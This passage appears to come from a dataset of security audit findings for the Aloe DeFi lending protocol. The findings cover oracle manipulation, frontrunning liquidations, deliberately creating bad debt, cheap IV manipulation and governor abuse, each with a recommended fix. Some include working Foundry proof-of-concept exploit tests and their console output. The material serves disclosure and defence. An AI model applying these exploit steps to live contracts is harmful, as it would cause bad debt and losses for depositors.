counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n" +Oracle.sol: manipulation via increasing Uniswap V3 pool observationCardinality,high,"The `Oracle.consult` function takes a `uint40 seed` parameter and can be used in either of two ways:\\nSet the highest 8 bit to a non-zero value to use Uniswap V3's binary search to get observations\\nSet the highest 8 bit to zero and use the lower 32 bits to provide hints and use the more efficient internal `Oracle.observe` function to get the observations\\nThe code for Aloe's `Oracle.observe` function is adapted from Uniswap V3's Oracle library.\\nTo understand this issue it is necessary to understand Uniswap V3's `observationCardinality` concept.\\nA deep dive can be found here.\\nIn short, it is a circular array of variable size. The size of the array can be increased by ANYONE via calling `Pool.increaseObservationCardinalityNext`.\\nThe Uniswap V3 `Oracle.write` function will then take care of actually expanding the array once the current index has reached the end of the array.\\nAs can be seen in this function, uninitialized entries in the array have their timestamp set to `1`.\\nAnd all other values in the observation struct (array element) are set to zero:\\n```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. 
seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n\\nHere's an example for a simplified array to illustrate how the Aloe `Oracle.observe` function might read an invalid value:\\n```\\nAssume we are looking for the target=10 timestamp.\\n\\nAnd the observations array looks like this (element values are timestamps):\\n\\n| 12 | 20 | 25 | 30 | 1 | 1 | 1 |\\n\\nThe length of the array is 7.\\n\\nLet's say we provide the index 6 as the seed and the current observationIndex is 3 (i.e. pointing to timestamp 30)\\n\\nThe Oracle.observe function then chooses 1 as the left timestamp and 12 as the right timestamp.\\n\\nThis means the invalid and uninitialized element at index 6 with timestamp 1 will be used to calculate the Oracle values.\\n```\\n\\nHere is the section of the `Oracle.observe` function where the invalid element is used to calculate the result.\\nBy updating the observations (e.g. swaps in the Uniswap pool), an attacker can influence the value that is written on the left of the array, i.e. he can arrange for a scenario such that he can make the Aloe `Oracle` read a wrong value.\\nUpstream this causes the Aloe `Oracle` to continue calculation with `tickCumulatives` and `secondsPerLiquidityCumulativeX128s` haing a corrupted value. 
Either `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` AND `secondsPerLiquidityCumulativeX128s[1]`, `tickCumulatives[1]` or only `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` are assigned invalid values (depending on what the timestamp on the left of the array is).",The `Oracle.observe` function must not consider observations as valid that have not been initialized.\\nThis means the `initialized` field must be queried here and here and must be skipped over.,"The corrupted values are then used in the further calculations in `Oracle.consult` which reports its results upstream to `VolatilityOracle.update` and `VolatilityOracle.consult`, making their way into the core application.\\nThe TWAP price can be inflated such that bad debt can be taken on due to inflated valuation of Uniswap V3 liqudity.\\nBesides that there are virtually endless possibilities for an attacker to exploit this scenario since the Oracle is at the very heart of the Aloe application and it's impossible to foresee all the permutations of values that a determined attacker may use.\\nE.g. the TWAP price is used for liquidations where an incorrect TWAP price can lead to profit. If the protocol expects you to exchange 1 BTC for 10k USDC, then you end up with ~20k profit.\\nSince an attacker can make this scenario occur on purpose by updating the Uniswap observations (e.g. by executing swaps) and increasing observation cardinality, the severity of this finding is ""High"".","```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. 
seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n" +It is possible to frontrun liquidations with self liquidation with high strain value to clear warning and keep unhealthy positions from liquidation,high,"`Borrower.warn` sets the time when the liquidation (involving swap) can happen:\\n```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n\\nBut `Borrower.liquidation` clears the warning regardless of whether account is healthy or not after the repayment:\\n```\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n```\\n\\nThe scenario above is demonstrated in the test, add this to Liquidator.t.sol:\\n```\\nfunction test_liquidationFrontrun() public {\\n uint256 margin0 = 1595e18;\\n uint256 margin1 = 0;\\n uint256 borrows0 = 0;\\n uint256 borrows1 = 1e18 * 100;\\n\\n // Extra due to rounding up in liabilities\\n margin0 += 1;\\n\\n deal(address(asset0), address(account), margin0);\\n deal(address(asset1), address(account), margin1);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, borrows1);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(lender1.borrowBalance(address(account)), borrows1);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n assertEq(asset1.balanceOf(address(account)), borrows1 + margin1);\\n\\n _setInterest(lender0, 10100);\\n _setInterest(lender1, 10100);\\n\\n account.warn((1 << 32));\\n\\n uint40 unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, block.timestamp + LIQUIDATION_GRACE_PERIOD);\\n\\n skip(LIQUIDATION_GRACE_PERIOD + 1);\\n\\n // listen for liquidation, or be the 1st in the block when warning is cleared\\n // liquidate with very high strain, basically 
keeping the position, but clearing the warning\\n account.liquidate(this, bytes(""""), 1e10, (1 << 32));\\n\\n unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, 0);\\n\\n // the liquidation command we've frontrun will now revert (due to warning not set: ""Aloe: grace"")\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n}\\n```\\n","Consider clearing ""warn"" status only if account is healthy after liquidation.","Very important protocol function (liquidation) can be DOS'ed and make the unhealthy accounts avoid liquidations for a very long time. Malicious users can thus open huge risky positions which will then go into bad debt causing loss of funds for all protocol users as they will not be able to withdraw their funds and can cause a bank run - first users will be able to withdraw, but later users won't be able to withdraw as protocol won't have enough funds for this.",```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n +"`Borrower`'s `modify`, `liquidate` and `warn` functions use stored (outdated) account liabilities which makes it possible for the user to intentionally put him into bad debt in 1 transaction",high,"Possible scenario for the intentional creation of bad debt:\\nBorrow max amount at max leverage + some safety margin so that position is healthy for the next few days, for example borrow 10000 DAI, add margin of 1051 DAI for safety (51 DAI required for `MAX_LEVERAGE`, 1000 DAI safety margin)\\nWait for a long period of market inactivity (such as 1 day).\\nAt this point `borrowBalance` is greater than `borrowBalanceStored` by a value higher than `MAX_LEVERAGE` (example: `borrowBalance` = 10630 DAI, `borrowBalanceStored` = 10000 DAI)\\nCall `modify` and withdraw max possible amount (based on borrowBalanceStored), for example, withdraw 1000 DAI (remaining assets = 10051 DAI, which is healthy based on stored balance of 10000 DAI, but in fact 
this is already a bad debt, because borrow balance is 10630, which is more than remaining assets). This works, because liabilities used are outdated.\\nAt this point the user is already in bad debt, but due to points 1-2, it's still not liquidatable. After calling `Lender.accrueInterest` the account can be liquidated. This bad debt caused is the funds lost by the other users.\\nThis scenario is not profitable to the malicious user, but can be modified to make it profitable: the user can deposit large amount to lender before these steps, meaning the inflated interest rate will be accured by user's deposit to lender, but it will not be paid by the user due to bad debt (user will deposit 1051 DAI, withdraw 1000 DAI, and gain some share of accured 630 DAI, for example if he doubles the lender's TVL, he will gain 315 DAI - protocol fees).\\nThe scenario above is demonstrated in the test, create test/Exploit.t.sol:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from ""src/libraries/constants/Constants.sol"";\\nimport {Q96} from ""src/libraries/constants/Q.sol"";\\nimport {zip} from ""src/libraries/Positions.sol"";\\n\\nimport ""src/Borrower.sol"";\\nimport ""src/Factory.sol"";\\nimport ""src/Lender.sol"";\\nimport ""src/RateModel.sol"";\\n\\nimport {FatFactory, VolatilityOracleMock} from ""./Utils.sol"";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? 
_A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(""mainnet""));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the 
""extra"" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n emit log_named_uint(""Before liquidation User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Before liquidation User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(""Before liquidation User assets:"", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 
200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 10629296791890000000000\\n User stored borrow:: 10000000000000000000000\\n Before liquidation User borrow:: 
10630197795010000000000\\n Before liquidation User stored borrow:: 10630197795010000000000\\n Before liquidation User assets:: 10051000000000000000000\\n Liquidated User borrow:: 579197795010000000001\\n Liquidated User assets:: 0\\n```\\n\\nAs can be seen, in the end user debt is 579 DAI with 0 assets.",Consider using `borrowBalance` instead of `borrowBalanceStored` in `_getLiabilities()`.,"Malicious user can create bad debt to his account in 1 transaction. Bad debt is the amount not withdrawable from the lender by users who deposited. Since users will know that the lender doesn't have enough assets to pay out to all users, it can cause bank run since first users to withdraw from lender will be able to do so, while those who are the last to withdraw will lose their funds.","```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from ""src/libraries/constants/Constants.sol"";\\nimport {Q96} from ""src/libraries/constants/Q.sol"";\\nimport {zip} from ""src/libraries/Positions.sol"";\\n\\nimport ""src/Borrower.sol"";\\nimport ""src/Factory.sol"";\\nimport ""src/Lender.sol"";\\nimport ""src/RateModel.sol"";\\n\\nimport {FatFactory, VolatilityOracleMock} from ""./Utils.sol"";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? 
_A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(""mainnet""));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the 
""extra"" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n emit log_named_uint(""Before liquidation User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Before liquidation User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(""Before liquidation User assets:"", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 
200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n" +IV Can be Decreased for Free,high,"The liquidity at a single `tickSpacing` is used to calcualte the `IV`. 
The more liquidity is in this tick spacing, the lower the `IV`, as demonstrated by the `tickTvl` dividing the return value of the `estimate` function:\\n```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n\\nSince this uses data only from the block in which the function is called, the liquidity can easily be increased by:\\ndepositing a large amount of liquidity into the `tickSpacing`\\ncalling update\\nremoving the liquidity\\nNote that only a small portion of the total liquidity in the entire pool is in the active liquidity tick. Therefore, the capital cost required to massively increase the liquidity is low. Additionally, the manipulation has zero cost (aside from gas fees), as no trading is done through the pool. Contrast this with a pool price manipulation, which costs a significant amount of trading fees to trade through a large amount of the liquidity of the pool.\\nSince this manipulation costs nothing except gas, the `IV_CHANGE_PER_UPDATE`, which limits the amount that IV can be manipulated per update, does not sufficiently disincentivise manipulation; it just extends the time period required to manipulate.\\nDecreasing the IV increases the LTV, and due to the free cost, it's reasonable to increase the LTV to the max LTV of 90% even for very volatile assets. Aloe uses the IV to estimate the probability of insolvency of loans. 
With the delay inherent in TWAP oracle and the liquidation delay by the warn-then-liquidate process, this manipulation can turn price change based insolvency from a 5 sigma event (as designed by the protocol) to a likely event.","Use the time weighted average liquidity of in-range ticks of the recent past, so that single block + single tickSpacing liquidity deposits cannot manipulate IV significantly.",Decreasing IV can be done at zero cost aside from gas fees.\\nThis can be used to borrow assets at far more leverage than the proper LTV\\nBorrowers can use this to avoid liquidation\\nThis also breaks the insolvency estimation based on IV for riskiness of price-change caused insolvency.,```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n +governor can permanently prevent withdrawals in spite of being restricted,medium,"Quoting from the Contest README:\\n```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. 
We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n\\nThe mechanism by which users are ensured that they can withdraw their funds is the interest rate which increases with utilization.\\nMarket forces will keep the utilization in balance such that when users want to withdraw their funds from the `Lender` contracts, the interest rate increases and Borrowers pay back their loans (or get liquidated).\\nWhat the `governor` is allowed to do is to set a interest rate model via the `Factory.governMarketConfig` function.\\nThis clearly shows that the `governor` should be very much restricted in setting the `RateModel` such as to not damage users of the protocol which is in line with how the `governor` role is described in the README.\\nHowever the interest rate can be set to zero even if the utilization is very high. If Borrowers can borrow funds for a zero interest rate, they will never pay back their loans. This means that users in the Lenders will never be able to withdraw their funds.\\nIt is also noteworthy that the timelock that the governor uses won't be able to prevent this scenario since even if users withdraw their funds as quickly as possible, there will probably not be enough time / availability of funds for everyone to withdraw in time (assuming a realistic timelock length).","The `SafeRateLib` should ensure that as the utilization approaches `1e18` (100%), the interest rate cannot be below a certain minimum value.\\nThis ensures that even if the `governor` behaves maliciously or uses a broken `RateModel`, Borrowers will never borrow all funds without paying them back.",The `governor` is able to permanently prevent withdrawals from the Lenders which it should not be able to do according to the contest README.,"```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. 
It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n" +Uniswap Formula Drastically Underestimates Volatility,medium,"Note: This report will use annualised IV expressed in %, even though the code representation uses different scaling.\\nAloe estimates implied volatility based on the article cited below (taken from in-line code comments)\\nLambert's article describes a method of valuing Uniswap liquidity positions based on volatility. It is correct to say that the expected value of holding an LP position can be determined by the formula referenced in the article. A liquidity position can be valued the same as ""selling a straddle"", which is a short-volatility strategy which involves selling both a put and a call. Lambert does this by representing fee collection as an options premium and impermanent loss as the cost paid by the seller when the underlying hits the strike price. If the implied volatility of a uniswap position is above the fair IV, then it is profitable to be a liquidity provider; if it is lower, then it is not.\\nKEY POINT: However, this does not mean that re-arranging the formula to derive IV gives a correct estimation of IV.\\nThe assumptions of the efficient market hypothesis hold true only when there is a mechanism and incentive for rational actors to arbitrage the value of positions to fair value. There is a direct mechanism to push down the IV of Uniswap liquidity positions - if the IV is too high then providing liquidity is +EV, so rational actors would deposit liquidity, and thus the IV as calculated by Aloe's formula will decrease.\\nHowever, when the `IV` derived from Uniswap fees and liquidity is too low, there is no mechanism for rational actors to profit off correcting this. 
If you are not already a liquidity provider, there is no way to provide ""negative liquidity"" or ""short a liquidity position"".\\nIn fact the linked article by Lambert Guillaume contains data which demonstrates this exact fact - the table which shows the derived IV at time of writing having far lower results than the historical volatilities and the IV derived from markets that allow both long and short trading (like options exchanges such as Deribit).\\nHere is a quote from that exact article, which points out that the Uniswap derived IV is sometimes 2.5x lower. Also check out the table directly in the article for reference:\\n```\\n""The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets.""\\n```\\n\\nThe `IV's` in options markets or protocols that have long-short mechanisms such as Opyn's Squeeth have a correction mechanism for `IV's` which are too low, because you can both buy and sell options, and are therefore ""correct"" according to the Efficient Market Hypothesis. The Uniswap pool is a ""long-only"" market, where liquidity can be added, but not shorted, which leads to systematically lower `IV` than is realistic. The EMH model, both in soft and hard form, only holds when there is a mechanism for a rational minority to profit off correcting a market imbalance. 
If many irrational or utilitarian users deposit too much liquidity into a Uniswap v3 pool relative to the fee capture and `IV`, there's no way to profit off correcting this imbalance.\\nThere are 3 ways to validate the claim that the Uniswap formula drastically underestimates the IV:\\nOn chain data which shows that the liquidity and fee derivation from Uniswap gives far lower results than other\\nThe table provided in Lambert Guillaume's article, which shows a Uniswap pool derived IVs which are far lower than the historical volatilities of the asset.\\nStudies showing that liquidity providers suffer far more impermanent loss than fees.","2 possible options (excuse the pun):\\nUse historical price differences in the Uniswap pool (similar to a TWAP, but Time Weighted Average Price Difference) and use that to infer volatility alongside the current implementation which is based on fees and liquidity. Both are inaccurate, but use the `maximum` of the two values. The 2 `IV` calculations can be used to ""sanity check"" the other, to correct one which drastically underestimates the risk\\nSame as above, use the `maximum` of the fee/liquidity derived `IV` but use a market that has long/short possibilities such as Opyn's Squeeth to sanity check the `IV`.","The lower `IV` increases LTV, which means far higher LTV for risky assets. `5 sigma` probability bad-debt events, as calculated by the protocol which is basically an impossibility, becomes possible/likely as the relationship between `IV` or `Pr(event)` is super-linear","```\\n""The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets.""\\n```\\n" +Bad debt liquidation doesn't allow liquidator to receive its ETH bonus (ante),medium,"More detailed scenario\\nAlice account goes into bad debt for whatever reason. 
For example, the account has 150 DAI borrowed, but only 100 DAI assets.\\nBob tries to `liquidate` Alice account, but his transaction reverts, because remaining DAI liability after repaying 100 DAI assets Alice has, will be 50 DAI bad debt. `liquidate` code will try to call Bob's callee contract to swap 0.03 WETH to 50 DAI sending it 0.03 WETH. However, since Alice account has 0 WETH, the transfer will revert.\\nBob tries to work around the liquidation problem: 3.1. Bob calls `liquidate` with `strain` set to `type(uint256).max`. Liquidation succeeds, but Bob doesn't receive anything for his liquidation (he receives 0 ETH bonus). Alice's ante is stuck in the contract until Alice bad debt is fully repaid. 3.2. Bob sends 0.03 WETH directly to Alice account and calls `liquidate` normally. It succeeds and Bob gets his bonus for liquidation (0.01 ETH). He has 0.02 ETH net loss from liquidaiton (in addition to gas fees).\\nIn both cases there is no incentive for Bob to liquidate Alice. So it's likely Alice account won't be liquidated and a borrow of 150 will be stuck in Alice account for a long time. 
